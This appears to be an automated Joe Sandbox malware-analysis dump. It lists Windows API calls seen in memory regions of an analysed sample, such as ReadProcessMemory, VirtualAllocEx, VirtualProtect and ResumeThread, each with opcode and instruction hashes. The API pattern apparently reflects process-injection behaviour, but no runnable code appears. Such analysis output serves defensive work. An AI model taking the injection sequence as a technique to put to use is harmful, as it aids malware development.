                                                • Opcode Fuzzy Hash: 5eb1b80d4afb9a61dbd99c056226d61a5b526c1f705b8488b524733e04caefa2
                                                • Instruction Fuzzy Hash: D22118B1D003199FDB10DFAAC4857EEBBF4AF88324F54842AD519A7340DB789944CFA5
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074BED58
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 6f1c05310eaa3322b25ed4dddf5f01f42632894dfafb6f335d9af9f1b7165d73
                                                • Instruction ID: 7fd049eb4b006861cde3378d8bca8b37f8a198ecafbac67d1c42d9c51ef734b1
                                                • Opcode Fuzzy Hash: 6f1c05310eaa3322b25ed4dddf5f01f42632894dfafb6f335d9af9f1b7165d73
                                                • Instruction Fuzzy Hash: D82128B180035A9FDB10CFAAC881BDEBBF5FF88310F54842AE518A7240C7789910CBA5
                                                APIs
                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,072650EA,?,?,?,?,?), ref: 0726518F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                • Opcode ID: 2876df45ec1bd68258590a930a604ce004aa0416a9f5511fc3be5c94a991e67a
                                                • Instruction ID: a965166560c8ac47655e14648d5b95b0598268b11d081b3acb25ec4a3d9ebcfc
                                                • Opcode Fuzzy Hash: 2876df45ec1bd68258590a930a604ce004aa0416a9f5511fc3be5c94a991e67a
                                                • Instruction Fuzzy Hash: 6E1129B58143499FDB10CF9AC844BDEBFF8EB48320F14845AE514A7250C379A990CFA5
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 074B27EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 7eac028b82e2d715385b54e615a3c6b09a389cd097f66f6f32fc666ed7780abc
                                                • Instruction ID: 5ae56f28bfa578d8047fe49478934b62aadc0444c0f6afe1ce23d2b7ef3996e8
                                                • Opcode Fuzzy Hash: 7eac028b82e2d715385b54e615a3c6b09a389cd097f66f6f32fc666ed7780abc
                                                • Instruction Fuzzy Hash: 8721D8B59002499FDB10DF9AC544BDEFBF4FF48320F108429E558A7250D378A544CFA5
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 074B27EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: c87233d290bce40f97f595aee0e328f1a34f6af85a1b6d5f3210c7d9b554e522
                                                • Instruction ID: 00df2f70ac3e9dacbfe96cf1d3ca28ff7dd9209fa9d7295caa4fee7fd6fa2e3c
                                                • Opcode Fuzzy Hash: c87233d290bce40f97f595aee0e328f1a34f6af85a1b6d5f3210c7d9b554e522
                                                • Instruction Fuzzy Hash: ED21C7B59002499FDB10CF9AC544BDEBBF5FB48320F14842AE958A7350D3B89544CFA5
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074BEB96
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: c2a45a9f5720edd018e760e08b45dba4eb097b6a11518e38e6cd87037013cd0f
                                                • Instruction ID: 51784e4e4b9f11fa43cb736c87690865c775af283a1e95bcd91fc5019f32ac22
                                                • Opcode Fuzzy Hash: c2a45a9f5720edd018e760e08b45dba4eb097b6a11518e38e6cd87037013cd0f
                                                • Instruction Fuzzy Hash: A91159718003499FDF20DFAAC845BDFBBF5AF88320F148419E519A7250C7799910CFA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 9e63918fc94f612cfdc5f03157203fca0c4f3066814711187b53605788d97567
                                                • Instruction ID: 26b3d0974ac652ab61167b029b470fcfca67540fcdce49c4d1cc122335cc2027
                                                • Opcode Fuzzy Hash: 9e63918fc94f612cfdc5f03157203fca0c4f3066814711187b53605788d97567
                                                • Instruction Fuzzy Hash: B71128B19003498FDB20DFAAC8457DEFBF4AF88724F24845AD519A7240CB79A940CBA5
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0140AFBE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: e1123524eb3fc4f6623c5db91016a67d59d8c5927a2710d156e291876a5ea8a6
                                                • Instruction ID: 7d4c5d0d09b6d33f1096b7b0917a61bc516ff495e6c0d9a4ada7d6cebd6f6657
                                                • Opcode Fuzzy Hash: e1123524eb3fc4f6623c5db91016a67d59d8c5927a2710d156e291876a5ea8a6
                                                • Instruction Fuzzy Hash: 4D110FB6C003498FDB10CF9AC544BDEFBF4AF88224F20842AD528A7750C3B9A545CFA1
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 02D51E3D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2166981085.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d50000_file.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: a677846e85006034e43c74dc58a09ee652975b996dd3104eea1f74231abcf036
                                                • Instruction ID: edb55cd37165f40ee491ba53370625c4e996daae0056711f64f069ad16ddf439
                                                • Opcode Fuzzy Hash: a677846e85006034e43c74dc58a09ee652975b996dd3104eea1f74231abcf036
                                                • Instruction Fuzzy Hash: 3711E3B58003499FDB20CF99D985BDEBFF4EB88324F248459D558A7300C3B9A944CFA1
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 02D51E3D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2166981085.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d50000_file.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 472351d07dd7360b03d7b8e8492bcd403006784d80e80482cb589b0e116a8a0d
                                                • Instruction ID: e42508d49df29c32964bd20d93028e01571de5697363b7cd24b5db11b628ed64
                                                • Opcode Fuzzy Hash: 472351d07dd7360b03d7b8e8492bcd403006784d80e80482cb589b0e116a8a0d
                                                • Instruction Fuzzy Hash: DE11D3B58003499FDB10DF9AD945BDEBBF8EB48724F108459D918A7300C3B9A944CFA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 4d2b6e0b4f076743486fc683d84a80b42461d60b67e09f22ac30343b1f191192
                                                • Instruction ID: 0fe00230961038e50f0907a28be6684fdad49aef2df333551e970a1e719e7ce4
                                                • Opcode Fuzzy Hash: 4d2b6e0b4f076743486fc683d84a80b42461d60b67e09f22ac30343b1f191192
                                                • Instruction Fuzzy Hash: E311A335B00215EFCF15BB6898546BFBBB6AB85300F04847AE94D9B385DB718845C7E2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10d3ca95dd90a07fe902968770a81061eedde3a49f86ab7f7a19a7b481e035bb
                                                • Instruction ID: 2948f05cd45303efd3184af93dcf1fe19df75c96e47abd1ece01fc081590c307
                                                • Opcode Fuzzy Hash: 10d3ca95dd90a07fe902968770a81061eedde3a49f86ab7f7a19a7b481e035bb
                                                • Instruction Fuzzy Hash: E962EC74F04B459ED7749B6584983EFBAA1BB82301F504D9FC1FACA380DBB494858B87
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7142900b7f114164fbd387a02a97a7d20fe1e3e7c694f492c4ad6b375e01e83c
                                                • Instruction ID: f038ef80395f216c836b19cb6db90c8ab4b2727d6931bad17779ef29782f2440
                                                • Opcode Fuzzy Hash: 7142900b7f114164fbd387a02a97a7d20fe1e3e7c694f492c4ad6b375e01e83c
                                                • Instruction Fuzzy Hash: 77124DB8F09B425ED7745F6485883EFB690BB45301F60499FC0FACA395D774908A8B8B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b08950ba9bd8218225e957bec811198459e9e958f58955d5a7031484457356c6
                                                • Instruction ID: 30f6d9add1c42a4eea6b809cd5bc7a1e6af2216500862163e80230e984214748
                                                • Opcode Fuzzy Hash: b08950ba9bd8218225e957bec811198459e9e958f58955d5a7031484457356c6
                                                • Instruction Fuzzy Hash: 3E124DB8F09B425ED7745F6485883EFB690BB45301F60499FC0FACA395D774908A8B8B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3dec3a4bce920ee3118e4bd3055a4a166e69ab993da31ce6dca0290d0cc3f24d
                                                • Instruction ID: d01c5f64b9b49d349f48b26a279d7b9ffac8655c6b57fb4beeba2dbe717c9e83
                                                • Opcode Fuzzy Hash: 3dec3a4bce920ee3118e4bd3055a4a166e69ab993da31ce6dca0290d0cc3f24d
                                                • Instruction Fuzzy Hash: 8581E638710614CFC718EF29D498AAE7BF6BF89A04B1541AAE502CB375DB71EC41CB81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07661ea28d39a6a7b9dd083e7af3e2750fee8e4a24fa4b999f5bf10c12d00fa2
                                                • Instruction ID: 545c287eb2c0c41351facf503ec4e00d00937dbf043672111417a6208a0e3323
                                                • Opcode Fuzzy Hash: 07661ea28d39a6a7b9dd083e7af3e2750fee8e4a24fa4b999f5bf10c12d00fa2
                                                • Instruction Fuzzy Hash: 1981CA35A10208EFCB04DFA4D858AEDBBB5FF89301F10855AE542AB364DB70AD49CF91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e08d72128d33d175a7c119dd0dc406586f52d44ca5ab205af38da411e926ff6
                                                • Instruction ID: 6d580dce5897f9ab6cfa2a30f4d1ff0a1aeecccec4c778f71ff1c1535ec7d587
                                                • Opcode Fuzzy Hash: 9e08d72128d33d175a7c119dd0dc406586f52d44ca5ab205af38da411e926ff6
                                                • Instruction Fuzzy Hash: 7561F934B001188FDB14EBA9D594AEE77F2FF89310B2545AAD506EB7A0CB35EC41CB61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e4ad2afe41771c20be9bea9cea652e0c734fb417ba52a161b8dc23d231134e89
                                                • Instruction ID: 8cbca4fe81f417166dcb15e7f3fce64e9c0d9bdfa813669f33ab9026ed8fbc8d
                                                • Opcode Fuzzy Hash: e4ad2afe41771c20be9bea9cea652e0c734fb417ba52a161b8dc23d231134e89
                                                • Instruction Fuzzy Hash: 1B714C30E006498FDB14DFA9D8547EEBBF6BF84301F10896AE906A7350EF349945CB92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27efcbb72477d778c1d232c6cde07202d53aec87c6754fd5d838b7be87e944dc
                                                • Instruction ID: 53ecdae7846b9025f2431a8a3e322a5712a0c4d720a0c33755a8af86cfe49058
                                                • Opcode Fuzzy Hash: 27efcbb72477d778c1d232c6cde07202d53aec87c6754fd5d838b7be87e944dc
                                                • Instruction Fuzzy Hash: 6D614C34B101098FDB15DF68D554BEE7BF6FF88715F1444AAE902AB390CA709C41CB92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f4857d80a8e80a4cd49f3092271f965efdbdc83b7d13608b41d055b81d85a69
                                                • Instruction ID: 66af61e4e0f9e6f0e07ace6d7651e41f3473f4da82e3c789277ec3a6174a1c22
                                                • Opcode Fuzzy Hash: 2f4857d80a8e80a4cd49f3092271f965efdbdc83b7d13608b41d055b81d85a69
                                                • Instruction Fuzzy Hash: 9D719E74A01208AFCB15DFA9D884EAEBBB6FF48714B114099F906AB361D731EC81CB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a6922d5dd4e9d6f0480db71586b9fecc870b0e672099d2c2dd06f9f5368b9853
                                                • Instruction ID: 759ae29015cb27a220f41ee51619d21637fd7b3e8ab5614e1a878e0af27511ab
                                                • Opcode Fuzzy Hash: a6922d5dd4e9d6f0480db71586b9fecc870b0e672099d2c2dd06f9f5368b9853
                                                • Instruction Fuzzy Hash: 0911C475A0031A4BDB15DE6A98446FFBBF7FFC4650B25492ED415D3340DF7089058761
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3873bd671174b0f6957aeef7deed0f8a119fc2cb76c075de4de81dd46f738c2f
                                                • Instruction ID: 54decc12e7b354a31645b2dd5257f296d4d073b18a1d5966c93c233524cf8fb1
                                                • Opcode Fuzzy Hash: 3873bd671174b0f6957aeef7deed0f8a119fc2cb76c075de4de81dd46f738c2f
                                                • Instruction Fuzzy Hash: 251137757006119FCB288E16C488FABB3B6BB88621F10446EEA4A8B765D771E941CB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c954e2f28fb4f4cd67501ffeb9f4d3e6b74b88901a5d33726dd8b41a09837d5
                                                • Instruction ID: 5eeea53c79253ab7695cd630d73a9a5a90ea2dc2f7b283027abf045970562c51
                                                • Opcode Fuzzy Hash: 2c954e2f28fb4f4cd67501ffeb9f4d3e6b74b88901a5d33726dd8b41a09837d5
                                                • Instruction Fuzzy Hash: 4921BA71E1020A9F8B04DFA9C9448AFFBF9FF98710B10855AE518E7215E770A956CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f16f59cd4841f83c92c0728fcb3c286cd3e9ed83b58350725e5afba930cb48d
                                                • Instruction ID: 975d7a8639cad71a0672c4054560e2cd98f85fb288e4165715a7caa2daad4b49
                                                • Opcode Fuzzy Hash: 7f16f59cd4841f83c92c0728fcb3c286cd3e9ed83b58350725e5afba930cb48d
                                                • Instruction Fuzzy Hash: AE116D71A0429A9FCF01DF69C884AEE7BF5FF49600B04446AE919D7721EB30D911CBA2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 711b1286a5c57878dd6292cffc1bd1fdaf626b8f8aacc949f25e13fd990e9712
                                                • Instruction ID: 6d3b87239ec40d68e3cedae96bbc909f11764c0f895dfdc719ebc8028f6fbe8e
                                                • Opcode Fuzzy Hash: 711b1286a5c57878dd6292cffc1bd1fdaf626b8f8aacc949f25e13fd990e9712
                                                • Instruction Fuzzy Hash: 6F112E31B0065A8BCB54EBB9A8106EFB7F6BF89711B50407AC505E7344EF718D02CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e4fc2f0fb7bbd8794f6005eddecee044987e1aeb43a0deb8629cfe818f2c76f2
                                                • Instruction ID: 7cf17a1d1975e5245a9d193b68b96abfe4d205c2021ff1c164f17b6231d0825f
                                                • Opcode Fuzzy Hash: e4fc2f0fb7bbd8794f6005eddecee044987e1aeb43a0deb8629cfe818f2c76f2
                                                • Instruction Fuzzy Hash: 2711FE75E0020A9FCB45DFADC8409AEBFF1FF88310B10816AE918D7315D7309911CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2164124846.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_132d000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                • Instruction ID: 5e7662a57b39674a460f987002ba17f467078a9edbebbe0d9a03e94a9e1f9a87
                                                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                • Instruction Fuzzy Hash: EE11DF76404280CFCB02DF54D5C0B16BF71FB84318F34C6A9D8090B256C33AD456CBA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1fb67c02cc07f9ff45b57be01e17dbd5e65119accc7907d888cdb5775f3e9690
                                                • Instruction ID: 4abbd60ecab3fe6c9c543ede4678cd380ef95dafe66af0685e703043276f7a3d
                                                • Opcode Fuzzy Hash: 1fb67c02cc07f9ff45b57be01e17dbd5e65119accc7907d888cdb5775f3e9690
                                                • Instruction Fuzzy Hash: 2C018275A002164B8B25DA7A98849FFB7B7FBC4260725492AD419D3340DF708D058761
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2164259410.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_133d000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                • Instruction ID: d00527f37aed1dc0eac6de3fb2c2ef8994922893cdc6206b67acd0306732cb19
                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                • Instruction Fuzzy Hash: 0611BB75504280DFCB02CF54C5C0B15BBB1FB84228F24C6A9D8498B2A6C33AD40ACB61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2b73e3e149cd62ac63c9dd75e02b079998fc1ff6a1eefe91a81a84e11d14ce3
                                                • Instruction ID: 40f99bbc80cc3059754637be00ddd8f1e5744e49e7730c6880a0431d77acba96
                                                • Opcode Fuzzy Hash: e2b73e3e149cd62ac63c9dd75e02b079998fc1ff6a1eefe91a81a84e11d14ce3
                                                • Instruction Fuzzy Hash: 4811E5303042114FEB056B2994157EA3BE6EB95308F10856ED18DCF2C3CDFA68464BE1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a201f00af7c4fe2378a2edf3ae55c0a9222d1c935a9c499a3a2262b0bfb91652
                                                • Instruction ID: b1d44f093d89bec14228027b62ae288396ebc35e01ea221d2aa700e138e8dcdd
                                                • Opcode Fuzzy Hash: a201f00af7c4fe2378a2edf3ae55c0a9222d1c935a9c499a3a2262b0bfb91652
                                                • Instruction Fuzzy Hash: 56119BB5E0051A9F8B44DFADC9449AEFBF5FF8C310B10816AE919E7315E7309911CBA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a00e4770e621273c9b9ee4370f8c05b457b46d82b094347e0e2ebe5f9451632b
                                                • Instruction ID: 95d349960f3d180b02afd6425560dfb045f7fa169b94f5cc072176831f8151ae
                                                • Opcode Fuzzy Hash: a00e4770e621273c9b9ee4370f8c05b457b46d82b094347e0e2ebe5f9451632b
                                                • Instruction Fuzzy Hash: 7E113C71A002599FCF11DF69C884AAE7BF5FF48610F00446AE919D7711EB31DA11CBA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c7ff6b580bc5e73f98c8f350cbfa383a772422d9a38d6271d6312651f85b63e3
                                                • Instruction ID: 97d5a561be75ad358a5c8ebfba05334c5d48e806271e6f4eef687b8e0c371736
                                                • Opcode Fuzzy Hash: c7ff6b580bc5e73f98c8f350cbfa383a772422d9a38d6271d6312651f85b63e3
                                                • Instruction Fuzzy Hash: D501B5303443124BEB08BA69D41479A7AD6EB94718F10C62DD18DCF7C6CEFA68464BE1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06346cc47ddcd23c73736563a5bc1a010980be2fbf643a8d95127a8691b2816a
                                                • Instruction ID: 707052b67d58c312246865ae7b4c9d868b47c1ec5a161741eeb3c8acb3b4dae2
                                                • Opcode Fuzzy Hash: 06346cc47ddcd23c73736563a5bc1a010980be2fbf643a8d95127a8691b2816a
                                                • Instruction Fuzzy Hash: D701F1353082419FC718DB29D814E6BBBB6FFC6220B1485EED0468B365DBB0DC02CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2f8cd6bc2ed480a9805a9e73352f5fd7d3864e47c3571e5937abcf9cccbda34
                                                • Instruction ID: 74a766bd648d6dd8ffacac143b8e205052ec158191e9d4dc4c915f3fe899fe72
                                                • Opcode Fuzzy Hash: d2f8cd6bc2ed480a9805a9e73352f5fd7d3864e47c3571e5937abcf9cccbda34
                                                • Instruction Fuzzy Hash: 6901DF343043118FCB18A666D840AABB7AABFC4220B14D6BFC8068B254CF75DC42CB92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73140cf191d9ec1a0ff7915896876eea33756b4759bd64196098e6c4ad2a21a3
                                                • Instruction ID: 04ce399cef6b1d46c035ae06fb75ca0d4b484122f7357ed54798aec6f86da266
                                                • Opcode Fuzzy Hash: 73140cf191d9ec1a0ff7915896876eea33756b4759bd64196098e6c4ad2a21a3
                                                • Instruction Fuzzy Hash: 5A01A2343003158BCB18A66AC840B7B77AABFC0220724D66EC80687354DF74DC02CB92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2164124846.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_132d000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b9b2fa2d8cc96cc4c1618b4ec120d5f7ed747d2bde952c4663f2c510cc474662
                                                • Instruction ID: a66f417cbc1a5e90882af58ef1716899ebca70d46cf381298bbaca2a7bc61135
